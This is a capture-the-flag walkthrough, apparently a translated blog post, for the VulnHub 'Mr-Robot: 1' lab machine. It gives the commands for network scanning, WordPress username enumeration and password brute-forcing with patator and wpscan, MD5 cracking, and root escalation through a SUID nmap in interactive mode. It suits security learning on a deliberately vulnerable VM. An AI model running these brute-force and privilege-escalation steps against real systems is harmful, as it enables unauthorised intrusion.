VulnHub: Immerse yourself in hacking in the style of the TV series Mr. Robot

I think many watched the TV series Mr. Robot, with each season, more and more people learn about it, so VulnHub has not stood aside. And not so long ago there appeared a Boot2Root virtual machine Mr-Robot: 1 . Her decision, we will consider today.



There will be no reverse here, but there will be several examples demonstrating how, because of the incorrect assignment of rights to critical files, your system can be hacked. And so, let's start, you need to get 3 keys.

')

Key 1

We get the list of ports already known to us:

$ sudo arp-scan -l -I wlan0 | grep "CADMUS COMPUTER SYSTEMS" | awk '{print $1}' | xargs sudo nmap -sV 

80 / tcp open http Apache httpd

443 / tcp open ssl / http apache httpd

Next, we will launch a robotscan , which we have already used in one of the articles :

 $ ./robotscan.py -u 'http://192.168.1.29' -e txt,php -w /usr/share/dirb/wordlists/big.txt -x 403 

First key:

 $ curl http://192.168.1.29/key-1-of-3.txt 073403c8a58a1f80d943455fb30724b9 

Key 2

As you noticed, there is another 1 not typical WordPress file: fsocity.dic . As it turned out, this is already a ready dictionary for brutus. It remains to remove duplicates from it:

 $ sort -u fsocity.dic > fsocity_sort.dic 

WPScan refused to look for available users, so you have to do it in another way:

PS WPScan checks the URL of the form: target_url /? Author = $ id

At the same time, by default, when logging in, the wp-login.php script returns “Invalid username” if the user is not found, and “The password you entered for the username is $ username is incorrect”

 $ sudo patator http_fuzz url=http://192.168.1.29/wp-login.php method=POST body='log=FILE0&pwd=nn&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.1.29%2Fwp-admin%2F&testcookie=1' follow=1 accept_cookie=1 0=./fsocity_sort.dic -x ignore:fgrep='Invalid username' 

And after some time we get the conclusion:

22:28:26 patator INFO - 200 4093: 3643 0.262 | Elliot | 5474 | HTTP / 1.1 200 OK

22:28:26 patator INFO - 200 4093: 3643 0.276 | elliot | 5473 | HTTP / 1.1 200 OK

22:28:27 patator INFO - 200 4093: 3643 0.235 | ELLIOT | 5475 | HTTP / 1.1 200 OK

Login is, it remains to pick up a password. As a dictionary, use the same file:

 $ sudo ./wpscan.rb --url 192.168.1.29 --threads 50 --wordlist ./fsocity_sort.dic --username elliot 

We throw ourselves a shell through Metasploit :







First we examine the contents of the directory with users:







The key is here, but the robot user credits are needed. Opening the second available file, we find the information we need:

 $ cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b 

It remains to decrypt MD5 on the nearest online service : abcdefghijklmnopqrstuvwxyz .



Login in virtual server and get the second key:

Key 3

The third key is probably located at the root user . See available SUID applications:

 $ find / -perm -4000 2>/dev/null 

Nothing ordinary but nmap 'a. After launching without parameters, we get help, and a potential vulnerability:







As MrRobot would say:

Hacking them was easy, they used the old version of nmap 'and with the support of interactive mode, and not correctly set rights, so I easily got root access

 $ nmap --interactive 

From interactive mode, launch the command shell ! Sh , and take the last key:







That's all. The next confirmation of how wrong the right distinction is leads to the compromise of the system!